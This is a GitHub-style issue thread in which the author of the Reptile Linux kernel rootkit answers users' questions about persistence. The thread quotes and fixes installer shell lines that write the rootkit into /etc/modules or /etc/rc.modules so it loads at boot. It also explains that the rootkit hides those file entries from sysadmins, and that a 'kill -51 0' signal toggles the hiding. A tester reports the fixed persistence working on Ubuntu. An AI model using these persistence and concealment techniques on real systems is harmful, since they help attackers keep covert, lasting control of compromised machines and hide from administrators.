if restart computer, rootkit will fail?

[f0rb1dd3n]

No, Reptile is persistent.

I closed this issue unintentionally. But i reopened it.

I will let you close this issue If my answer helps you!

;)

[corefx]

Hi, Persistency is not currently working because nothing gets written to the /etc/modules or /etc/rc.modules files. if [ "$SYSTEM" == "debian" ] || [ "$SYSTEM" == "ubuntu" ]; then echo -e "" >> /etc/modules || { echo -e "\e[01;31mERROR!\e[00m\n"; exit; } elif [ "$SYSTEM" == "redhat" ] || [ "$SYSTEM" == "centos" ] || [ "$SYSTEM" == "fedora" ]; then echo -e "" >> /etc/rc.modules && \ chmod +x /etc/rc.modules || { echo -e "\e[01;31mERROR!\e[00m\n"; exit; }

[f0rb1dd3n]

@corefx, The persistence is there, Reptile is configured to hide this file content to make persistence more stealth. When the sysadmin try to see, there is nothing written. But when the system boots, Reptile is not load yet, and the content written on this file is not hidden, so the Init will read and load Reptile properly. After Reptile loaded that content will be hidden.

You can check this out just typing kill -51 0 to disable the "file content hiding" feature. And you will see the configuration written at /etc/modules.

Any doubts?

;)

[corefx]

I mean the following line in the installer.sh file: echo -e "" >> /etc/modules Installer.sh does not (currently) write anything to /etc/modules or /etc/rc.modules files so persistency does not work.

[f0rb1dd3n]

hey man,

thank you for this report. That line sould be echo -e "#<reptile>\nreptile\n#</reptile>" >> /etc/modules

I really didnt see that. I commit one of the testing codes. Sorry for that. And thank you again for this report

[f0rb1dd3n]

@yanzhenqiang and @corefx

I have commited right now the fixing for that. Sorry again for this mistake. Could you test if is working for you now?

[corefx]

I tested Reptile with your fix on Ubuntu 18.04 virtual machine and the persistence works fine.

[f0rb1dd3n]

Nice, I will review this code if I did another mistake like that.

[f0rb1dd3n]

@corefx,

I did some tests and some improvements on installer.sh and the part of persistence. Cause, you may get some erros in removing reptile, with installer.sh because of "hide file content feature".

So now, this is fixed.